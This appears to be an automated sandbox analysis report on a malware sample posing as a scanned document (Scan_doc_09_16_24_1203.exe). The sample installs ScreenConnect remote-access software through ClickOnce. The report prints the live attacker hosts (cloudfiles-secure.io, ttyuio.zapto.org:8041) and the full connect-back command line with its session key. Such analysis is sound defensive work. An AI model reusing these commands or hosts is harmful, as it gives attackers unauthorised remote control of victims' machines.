Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configC
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.p
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exeO
Source: ScreenConnect.Core.dll0.1.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.4:49731 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Scan_doc_09_16_24_1203.exe

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe

Code function: 11_2_05950360 CreateProcessAsUserW,

11_2_05950360

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\user.config
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Detected potential crypto function

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Code function: 0_2_005EA495	0_2_005EA495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B2B69	1_2_00007FFD9B8B2B69
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8C2AE0	1_2_00007FFD9B8C2AE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AAEF5	1_2_00007FFD9B8AAEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8BD2B5	1_2_00007FFD9B8BD2B5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AA460	1_2_00007FFD9B8AA460
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8C28F8	1_2_00007FFD9B8C28F8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AF8A1	1_2_00007FFD9B8AF8A1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A1211	1_2_00007FFD9B8A1211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A6138	1_2_00007FFD9B8A6138
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8C3081	1_2_00007FFD9B8C3081
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8770BD	12_2_00007FFD9B8770BD
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8710CF	12_2_00007FFD9B8710CF
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8710D7	12_2_00007FFD9B8710D7
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB85834	12_2_00007FFD9BB85834
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB85621	12_2_00007FFD9BB85621
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB863C2	12_2_00007FFD9BB863C2
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB862E9	12_2_00007FFD9BB862E9
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB86468	12_2_00007FFD9BB86468
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8A70BD	13_2_00007FFD9B8A70BD
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8A10D7	13_2_00007FFD9B8A10D7
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8A10CF	13_2_00007FFD9B8A10CF
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBBE1EC	13_2_00007FFD9BBBE1EC
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB1FB8	13_2_00007FFD9BBB1FB8
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBBEF9C	13_2_00007FFD9BBBEF9C
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB5E21	13_2_00007FFD9BBB5E21
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB6C6C	13_2_00007FFD9BBB6C6C

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140

Uses 32bit PE files

Source: Scan_doc_09_16_24_1203.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal66.evad.winEXE@19/75@2/2

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

0_2_005E1000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Command line argument: dfshim

0_2_005E1000

Source: Scan_doc_09_16_24_1203.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Scan_doc_09_16_24_1203.exe	ReversingLabs: Detection: 15%
Source: Scan_doc_09_16_24_1203.exe	Virustotal: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe "C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe"
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: rsaenh.dll	Jump to behavior
